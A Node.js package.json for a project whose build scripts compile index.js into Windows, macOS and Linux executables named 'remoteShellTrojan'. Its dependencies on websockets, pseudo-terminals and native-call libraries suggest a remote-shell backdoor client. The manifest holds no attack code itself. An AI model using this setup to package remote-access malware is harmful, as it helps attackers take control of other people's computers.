{
  "name": "wsnodeclinet",
  "version": "1.0.0",
  "description": "",
  "main": "index.js",
  "scripts": {
    "test": "echo \"Error: no test specified\" && exit 1",
    "build": "yarn build:win && yarn  build:mac && yarn build:linux",
    "build:win": "nexe  -t windows-x64-14.15.3 -o ./dist/release/remoteShellTrojan.exe --ico logo.ico  index.js",
    "build:mac": "nexe  -t mac-x64-14.15.3 -o ./dist/release/remoteShellTrojan_mac.exe  index.js ",
    "build:linux": "nexe  -t linux-x64-14.15.3 -o ./dist/release/remoteShellTrojan   index.js "
  },
  "author": "",
  "license": "ISC",
  "dependencies": {
    "diskinfo": "^0.0.3",
    "ffi-napi": "^4.0.3",
    "nexe": "^4.0.0-rc.1",
    "node-gyp-build": "^4.5.0",
    "node-pty": "^0.10.1",
    "pkg": "^5.8.0",
    "ref-array-napi": "^1.2.2",
    "ref-napi": "^3.0.3",
    "ref-struct-napi": "^1.1.1",
    "temp": "^0.9.4",
    "ws": "^8.10.0"
  }
}